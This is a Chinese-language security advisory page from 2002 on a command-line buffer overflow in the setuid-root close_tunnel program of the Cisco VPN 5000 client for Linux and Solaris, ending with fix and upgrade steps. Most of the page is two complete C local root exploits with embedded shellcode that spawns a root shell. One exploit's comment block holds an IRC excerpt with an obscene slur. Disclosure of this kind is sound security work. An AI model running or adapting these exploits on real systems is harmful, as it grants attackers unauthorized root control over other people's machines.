xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Cisco VPN 5000 Client存在缓冲溢出漏洞


发布时间:2002-09-24
更新时间:2002-09-24
严重程度:
威胁程度:本地管理员权限
错误类型:边界检查错误
利用方式:服务器模式

BUGTRAQ ID:5734

受影响系统
Cisco VPN 5000 Client for Linux 5.2.6
Cisco VPN 5000 Client for Solaris 5.2.7
详细描述
Cisco VPN 5000 UNIX客户端存在缓冲溢出,安装在Linux和Solaris系统下的Cisco VPN 5000 客户端中包含的'close_tunnel'和'open_tunnel'程序默认以SETUID ROOT属性安装,恶意用户可以利用这个漏洞提升权限,获得ROOT权限。

测试代码
/*
* [ElectronicSouls] Local Root Exploit for Cisco VPN 5000 Client
* (C) BrainStorm - 2002
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
* (gdb) i r
* eax            0xffffffff       -1
* ecx            0x0      0
* edx            0x0      0
* ebx            0x4015c154       1075167572
* esp            0xbfffdb70       0xbfffdb70
* ebp            0x41414141       0x41414141
* esi            0x400168e4       1073834212
* edi            0xbfffdbf4       -1073751052
* eip            0x41414141       0x41414141
* eflags         0x10286  66182
*
* as you can see %eip got filled with 0x41 ;)
*
* tested:
*         - on release 5.1.5
*         - from package: vpn-5000-linux-5.1.5-des-k8.tar.Z
*         - system RedHat Linux 7.2 / x86
*
* Bug Information:
*  There are multiple unchecked buffers in the code which allow
*  arbitrary code to be executed with root privileges.
*  this is due to insufficient bounds checking.
*  the result is a classic command line buffer overflow condition.
*  This should be exploitable on Linux/Solaris.
*
* IRC:
*  <BrainStor> a standard cmd line buffer overflow in the -d option
*  <BrainStor> close_tunnel is set +s by default
*  <v0id> tsk tsk tsk, cisco making errors like that
*  <v0id> fucking stupid cunts
*  <BrainStor> yea
*  <BrainStor> its ubeliveable
*  <v0id> man, standard buffer overflow should be practiclly non existant
these days
*  <v0id> oh well
*  <BrainStor> indeed
*  <BrainStor> but its good tho ;)
*/

#include <stdio.h>
#include <unistd.h>

#define B       2504
#define N       0x90
#define R       0xbfffefc0                                                //
may needs to be changed deppending on the distro/os..
#define BIN     "/bin/close_tunnel"                                       //
you maybe want to change this too =P
                                                                          //
/usr/local/bin/close_tunnel or so..
char shell[] = "HELO"                                                     //
yes this is a valid x86 instruction ;)
               "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"                         //
setuid();
               "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
               "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
               "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";


int main(int argc, char **argv[])
{
  int ret, off, es;

  char bof[B];

    printf("\n\n");
    printf("       [ElectronicSouls]       \n");
    printf(" Cisco VPN 5000 client exploit \n");
    printf("        (C) BrainStorm       \n\n");

    if(argv[1] == NULL) {
       off = 0;
       ret = R; }

    else {
       off = atoi(argv[1]);
       ret = atoi(argv[2])+off; }

    for (es = 0; es < B; es += 4 )
       *(long *) &bof[es] = ret;

    printf("+ return address: 0x%lx \n",ret);

    for (es = 0; es < (B - strlen(shell) - 36); ++es)
       *(bof+es) = N;

    memcpy(bof+es, shell, strlen(shell));

    printf("+ overflowing the buffer..\n\n\n");

    execl(BIN,BIN,"-d",bof,0);       // b00m!

  return(0);
}

-----------------------------------------------------------------

/*
* Cisco VPN 5000 Linux client version 5.1.5 local root exploit
*
* By zillion[at]safemode.org 09/2002
*
* Greets to the 0dd people ;p
*
*/

#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

#define BUFFER_SIZE 2504
#define NOP 0x90
#define RET 0xbffff0e0

char shellcode[]=

        /* setresuid(0,0,0) &&  execve("/bin/sh",["/bin/sh"],0); */
        "\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80"
        "\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff"
        "\x2f\x62\x69\x6e\x2f\x73\x68";

void print_error(char * burb) {
        printf(" Error: %s !\n",burb); exit(0);
}

void usage(char *progname) {
        printf("\nDefault: %s  -f /path/to/close_tunnel",progname);
        printf("\nOption : %s  -o <offset>\n\n",progname);
        exit(0);
}

int main(int argc, char **argv){

char buffer[BUFFER_SIZE];
char file[30];
long retaddress;
int arg,offset=600;

struct stat sbuf;

if(argc < 2) { usage(argv[0]); }

while ((arg = getopt (argc, argv, "f:o:")) != -1){
      switch (arg){
      case 'f':
        strncpy(file,optarg,sizeof(file));
        if(stat(argv[2], &sbuf)) { print_error("No such file");}
        break;
      case 'o':      
        offset = atoi(optarg);
        if(offset < 0) { print_error("Offset must be positive");}
        break;
      default :      
        usage(argv[0]);
     }
}

retaddress = (RET - offset);
memset(buffer,NOP,BUFFER_SIZE);
memcpy(buffer + BUFFER_SIZE - (sizeof(shellcode) + 8) ,shellcode,sizeof(shellcode) -1);

/* Overwrite EBP and EIP */
*(long *)&buffer[BUFFER_SIZE - 8]  = retaddress;
*(long *)&buffer[BUFFER_SIZE - 4]  = retaddress;

if(execl(file,file,"-d",buffer,NULL) != 0) {
        print_error("Could not execute file");
}

return 0;

}

解决方案
chmod u-s去掉相关程序S位。

升级程序:

Cisco VPN 5000 Client for Linux 5.2.6:

Cisco Upgrade VPN 5000 Client for Linux 5.2.7


Cisco VPN 5000 Client for Solaris 5.2.7:

Cisco Upgrade VPN 5000 Client for Solaris 5.2.8

相关信息
Niels Heinen <niels.heinen@ubizen.com>.
参考:http://www.cisco.com/warp/public/707/vpn5k-client-multiple-vuln-pub.shtml
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved